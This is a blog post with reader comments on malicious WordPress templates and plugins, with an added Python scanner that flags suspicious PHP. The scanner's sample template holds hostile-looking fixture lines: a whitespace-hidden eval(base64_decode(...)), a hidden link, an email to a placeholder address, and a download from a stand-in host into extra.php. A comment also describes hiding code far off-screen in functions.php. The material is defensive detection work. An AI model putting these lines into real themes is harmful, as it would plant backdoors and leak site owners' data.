WordPress security issues - inviting the hackers in and brewing them a tea
If, like me, you think WordPress is a great CMS, you've probably installed several templates and plugins. But do you know exactly what it is you are installing?
Chances are, unless you are a PHP programmer, you won't have given this a second thought.
So what is it you are installing?
WordPress plugins and some templates contain code that performs a particular task. Some of my favourite plugins are listed here.
So what’s the security issue?
Those plugins and templates could be malicious!
Most of us take precautions when downloading programs and files onto our desktops, but happily install plugins and templates on servers without giving it a second thought. So now you have your nice, shiny new template installed, but what else is it doing? The possibilities are endless: you could be opening your server up for sending out spam, or leaving your company server open to attack.
In the last few weeks alone I've seen:
- templates that send out emails when installed
- plugins inserting hidden links in all your posts
- mystery encoded PHP in templates
- plugins that install extra PHP files from remote servers
So what can you do?
Until there is an online system where plugins and templates are checked for security holes, and we're able to download them from a verified source, all we can do is be very careful. Before installing, look through those template and plugin files and check for suspicious code.
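One way to automate a first pass over that manual review, as an added example (not code from the original post): a Python scanner that flags lines in a template's or plugin's PHP files matching the four behaviours listed above, plus the very long lines mentioned in the comments. The patterns, the 500-character threshold and the sample template are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristic patterns (assumptions made for this example), one per behaviour
# listed in the post. A hit means "read this line", not "this is malicious".
CHECKS = {
    "encoded-php": re.compile(
        r"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "sends-email": re.compile(r"\b(wp_mail|mail)\s*\(", re.I),
    "remote-fetch": re.compile(
        r"\b(curl_exec|fsockopen|wp_remote_get)\s*\("
        r"|\b(file_get_contents|fopen|include|require)(_once)?\b[^;]*https?://", re.I),
    "hidden-link": re.compile(
        r"(display\s*:\s*none|visibility\s*:\s*hidden).*<a\s"
        r"|<a\s.*(display\s*:\s*none|visibility\s*:\s*hidden)", re.I),
}
MAX_LINE = 500  # assumed threshold for code pushed far off the right of the editor


def scan(root):
    """Return (relative_path, line_no, check_name) for each hit in .php files under root."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        for no, line in enumerate(text.splitlines(), 1):
            hits = [name for name, rx in CHECKS.items() if rx.search(line)]
            if len(line) > MAX_LINE:
                hits.append("very-long-line")
            findings += [(path.relative_to(root).as_posix(), no, h) for h in hits]
    return findings


def build_sample(root):
    """Write a constructed two-file template, used only to exercise the scanner."""
    (Path(root) / "index.php").write_text("<?php get_header(); the_content(); ?>\n")
    (Path(root) / "functions.php").write_text(
        "<?php\n"
        "function sample_setup() { register_nav_menu('main', 'Main'); }\n"
        + " " * 600 + "eval(base64_decode($blob));\n"
        "wp_mail('placeholder@example.invalid', 'installed', get_option('siteurl'));\n"
        "echo '<div style=\"display:none\"><a href=\"http://example.invalid/\">x</a></div>';\n"
        "file_put_contents('extra.php', file_get_contents('http://example.invalid/x.txt'));\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, no, name in scan(tmp):
            print(f"{rel}:{no}: {name}")
```

Many legitimate plugins call `wp_mail()` or fetch remote data, so treat each hit as a pointer to a line worth reading before installing rather than as a verdict.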

March 24th, 2008 at 11:33 pm
Someone just sent me a link here saying what a great article it was - I didn't realise it was you till I got halfway through!
Template files, yes - rife with issues - look in functions.php for stuff.
What the sneaky people do is change the content call to something that sounds the same, like the-content or the_content or the.content etc., and then hide that in the functions.php really really really far right and really really far down…
I like the do follow plugin that emails the post URL back to a site after every new post - guess what the author uses that info for?
Paul
March 26th, 2008 at 11:59 am
That person has great taste.
Hmmm, I wonder.